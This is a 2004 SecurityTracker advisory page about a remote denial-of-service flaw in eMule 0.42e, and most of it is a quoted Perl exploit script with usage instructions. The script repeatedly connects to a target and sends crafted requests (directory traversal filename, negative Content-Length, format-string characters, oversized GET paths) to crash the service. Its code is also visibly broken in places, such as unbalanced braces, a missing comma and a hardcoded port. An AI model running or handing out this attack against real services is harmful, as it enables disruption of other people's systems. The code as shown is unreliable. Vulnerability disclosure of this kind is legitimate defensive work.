SecurityTracker.com Archives - eMule Service Can Be Crashed By Remote Users Sending a Variety of Malformed Requests

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (File Transfer/Sharing) > eMule

Vendors: Emule-Project.net

eMule Service Can Be Crashed By Remote Users Sending a Variety of Malformed Requests

SecurityTracker Alert ID: 1010108

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: May 10 2004

Impact: Denial of service via network

Exploit Included: Yes

Version(s): 0.42e

Description: Rafel Ivgi (The-Insider) reported a denial of service vulnerability in eMule. A remote user can crash the service.

It is reported that a remote user can send a series of specially crafted requests to cause the eMule service to crash. The requests include a negative Content-Length POST request, GET requests with many characters and/or without the HTTP version specifier, a GET request with format string characters, a GET request with a filename with directory traversal characters, and others.

A demonstration exploit script is provided in the Source Message.

Impact: A remote user can cause the target service to crash.

Solution: No solution was available at the time of this entry.

Vendor URL: www.emule-project.net/ (Links to External Site)

Cause: Exception handling error

Underlying OS: Windows (Any)

Reported By: Rafel Ivgi, The-Insider <theinsider@012.net.il>

Message History: None.

Source Message Contents

Date: Mon, 10 May 2004 19:36:52 +0200
From: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Subject: Emule 0.42e Remote Denial Of Service Exploit

 


#!/usr/bin/perl

system("cls");
# Emule 0.42e Remote Denial Of Service Exploit
# Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com
# usage: perl emule042e.pl <host> <port> <how many times>

use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $times = $ARGV[2];

if ($host)
 
unless($port) { $port="4711";}
unless($times) { $times="50";}
 
                 print "Emule 0.42e Remote Denial Of Service Exploit
            Coded by The-Insider\n\n";
                 print "[+] Connecting to target $host:$port\n";
for $i (1..$times) {
                 $remote=IO::Socket::INET->new(Proto =>"tcp",
   PeerAddr => $host,
   PeerPort =>  80,
                                     Type => SOCK_STREAM
                                     Timeout => 8);

  unless ($remote)
                   {
                   die "can't connect to $host"
                   }
                   print "[+] Connected to target $host:$port\n";
                   print "[+] Sending Request\n";
  $remote ->autoflush(1);
print $remote "GET / HTTP/1.1
Content-Disposition: form-data; name=\"file\";
filename=\"../../../file.txt\"

";
print $remote "POST / HTTP/1.0
Content-Length: 10

123456789

";
print $remote "POST / HTTP/1.1
Content-Length: -1

";
print $remote "GET /%%%%%%%%%%%% HTTP/1.0

";
print $remote "index.htm

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa

";
print $remote "GET c:\

";
                   print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
                   while(<$remote>)
                   {
                   $cool .= $_;
  if ($cool =~ /Server:/i)
                   {
                   close $cool;
                  -close $remote;
                   }
                   }
                   print "[+] Target Demolished.\n";
}}}
else
 
die "\nEmule 0.42e Remote Denial Of Service Exploit
Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com


usage: perl emule042e.pl <host> <port> <how many times>\n\n";

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2004, SecurityGlobal.net LLC